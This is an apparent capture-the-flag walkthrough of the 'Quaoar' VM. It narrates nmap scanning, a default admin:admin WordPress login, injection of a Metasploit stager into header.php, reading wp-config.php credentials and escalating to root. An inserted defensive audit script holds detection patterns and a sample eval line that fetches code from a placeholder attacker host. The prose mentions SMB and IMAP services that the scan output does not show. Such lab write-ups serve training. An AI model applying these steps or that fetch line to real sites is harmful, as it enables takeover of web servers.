Onto the second VM for the night: Quaoar. With a difficulty of “Easy”, this should hopefully be a piece of cake.
When booting the VM for the first time, we were given its IP address (192.168.110.130), so let’s start with a comprehensive nmap scan to find any interesting open ports:
Nmap scan report for 192.168.110.130
Host is up (0.00012s latency).
Not shown: 65526 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| 1024 d0:0a:61:d5:d0:3a:38:c2:67:c3:c3:42:8f:ae:ab:e5 (DSA)
| 2048 bc:e0:3b:ef:97:99:9a:8b:9e:96:cf:02:cd:f1:5e:dc (RSA)
|_ 256 8c:73:46:83:98:8f:0d:f7:f5:c8:e4:58:68:0f:80:75 (ECDSA)
53/tcp open domain ISC BIND 9.8.1-P1
|_ bind.version: 9.8.1-P1
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
|_ Supported Methods: POST OPTIONS GET HEAD
| http-robots.txt: 1 disallowed entry
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
110/tcp open pop3 Dovecot pop3d
HTTP is up, SMB is another interesting one, there are a few IMAP/POP3 services, and SSH. Trying an SMB null session got nowhere, so let’s continue to HTTP.
We’re greeted with a “start” page:
Clicking it takes us to a “hack the planet” JPEG:
Running exiftool and steghide on these doesn’t turn up anything useful. Let’s move on to wfuzz:
We’ve got a couple of interesting entries here. Starting with upload, we’re taken to a site running the LEPTON CMS. All of the vulnerabilities found are for authenticated users, so it’s a dead end. Moving on to the next potentially low-hanging fruit, WordPress.
I try to make a cewl password list based on that Wikipedia link, but cewl isn’t cooperating, so I move on to wpscan to enumerate users:
The default admin account is still enabled, and attempting to log in with admin:admin works! Awesome, so we have a way to get a shell. I have a particular fondness for the web_delivery Metasploit module, so that’s what we’re going to use here:
Now we’re going to add part of that command to the header.php file in the appearance editor in WordPress:
Next, navigate to the main WordPress page and catch a shell in Metasploit:
Now that we’re in, I grab the contents of the wp-config.php file for those sweet, sweet MySQL creds:
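The defender’s counterpart to the two steps above (editing header.php through the built-in theme editor, then lifting database creds from wp-config.php), as an added example that is not part of the original writeup: it flags a wp-config.php that leaves the editor enabled or connects as the MySQL root user, and reports lines of injected PHP in theme headers. It assumes a default WordPress directory layout; the sample files are constructed, not taken from the VM.

```python
"""Added example: audit a WordPress tree for the weak points this walkthrough
relied on: theme-file edits through the built-in editor and injected PHP.
Assumes a default WordPress directory layout; sample files are constructed."""
import re
from pathlib import Path

# PHP constructs that have no business in a theme header and commonly
# appear in injected stagers and web shells.
SUSPICIOUS = re.compile(
    r"\b(eval|assert|system|exec|shell_exec|passthru|popen|proc_open)\s*\(", re.I)
REMOTE_INCLUDE = re.compile(r"file_get_contents\s*\(\s*['\"]https?://", re.I)
DEFINE = re.compile(r"define\s*\(\s*['\"](\w+)['\"]\s*,\s*(.+?)\s*\)\s*;")

def parse_defines(php: str) -> dict:
    """Return the define('KEY', value) pairs from a wp-config.php body."""
    return {k: v.strip("'\"") for k, v in DEFINE.findall(php)}

def audit_wp_config(php: str) -> list:
    """Flag settings that made the editor foothold and the DB-cred grab easy."""
    cfg = parse_defines(php)
    findings = []
    if cfg.get("DISALLOW_FILE_EDIT", "false").lower() != "true":
        findings.append("theme/plugin editor enabled (DISALLOW_FILE_EDIT not true)")
    if cfg.get("DB_USER") == "root":
        findings.append("WordPress connects to MySQL as root")
    return findings

def scan_theme_file(php: str) -> list:
    """Return 1-based line numbers of suspicious PHP in a theme file."""
    return [no for no, line in enumerate(php.splitlines(), 1)
            if SUSPICIOUS.search(line) or REMOTE_INCLUDE.search(line)]

def audit_tree(wp_root: Path) -> dict:
    """Audit a live install: wp-config.php plus every theme header.php."""
    report = {"wp-config.php": audit_wp_config((wp_root / "wp-config.php").read_text())}
    for f in (wp_root / "wp-content" / "themes").glob("*/header.php"):
        if hits := scan_theme_file(f.read_text()):
            report[str(f.relative_to(wp_root))] = hits
    return report

# Constructed samples (not taken from the VM) so the checks run offline.
SAMPLE_WP_CONFIG = """<?php
define('DB_NAME', 'wordpress');
define('DB_USER', 'root');
define('DB_PASSWORD', 'PLACEHOLDER-not-the-real-one');
"""
SAMPLE_HEADER = """<?php wp_head(); ?>
<!DOCTYPE html>
<?php eval(file_get_contents('http://ATTACKER-PLACEHOLDER/stage')); ?>
"""
```

Run `audit_tree(Path("/var/www/wordpress"))` (path is an assumption) against a real install; on the constructed samples the config yields two findings and the header flags line 3.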
Now that we’ve got those, I figure I might as well try to “su” to the root account with what we’ve got:
Nice! We’ve got root and, subsequently, the flag. Another flag can be found in /home/wpadmin/flag.txt. I’d say the difficulty rating of this VM was perfectly estimated.
Until next time.